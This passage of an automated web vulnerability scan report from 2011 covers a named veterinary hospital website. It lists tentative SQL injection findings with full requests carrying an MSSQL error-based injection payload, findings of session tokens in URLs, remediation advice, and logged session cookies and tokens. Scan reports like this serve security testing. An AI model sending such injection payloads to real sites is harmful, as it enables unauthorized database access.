You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

3.1. http://www.vcahospitals.com/main/offer previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.vcahospitals.com
Path:	/main/offer

Request

GET /main/offer?=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

3.2. http://www.vcahospitals.com/main/offer/ previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Request

GET /main/offer/?=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

3.3. http://www.vcahospitals.com/main/offer/thank-you.html previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Request

GET /main/offer/thank-you.html?addr=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&city=3&date=1307084400&email=netsparker@example.com&fname=Ronald%20Smith&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=Ronald%20Smith&newmex=0&optin=3&other=3&petage=3&petname=Ronald%20Smith&pettype=3&phone=3&referer=3&state=3&submit=Get+FREE+Coupon&token=d3e0554c85710ed27c818f2709c92045&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=3&zip=3 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:24 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3161
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

3.4. http://www.vcahospitals.com/tools/markers_sema.php previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.vcahospitals.com
Path:	/tools/markers_sema.php

Request

GET /tools/markers_sema.php?sema=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=gnrb178du6ouqlhertfrhhq1v7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:52 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 65
Content-Type: text/xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<markers>
</markers>

4. Session token in URL previous next
There are 6 instances of this issue:

/hanson/appt.html
/hanson/offer.html
/main/offer
/main/offer/
/main/offer/thank-you.html
/new-york-veterinary-hospital/appt.html

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

4.1. http://www.vcahospitals.com/hanson/appt.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d

Request

GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

4.2. http://www.vcahospitals.com/hanson/offer.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip=

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

4.3. http://www.vcahospitals.com/main/offer previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=B5F701EB-EA95-422D-924E-BCD921689D1E&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=595ca47f74a6874c96fd2cb4b94d5da9&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d2505B0C6-B6AA-4144-878F-54873D353284%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d917e022cccb7f727295d2ccceeb0579c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=B5F701EB-EA95-422D-924E-BCD921689D1E&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=595ca47f74a6874c96fd2cb4b94d5da9&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d2505B0C6-B6AA-4144-878F-54873D353284%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d917e022cccb7f727295d2ccceeb0579c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:14:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

4.4. http://www.vcahospitals.com/main/offer/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The URL in the request appears to contain a session token within the query string:

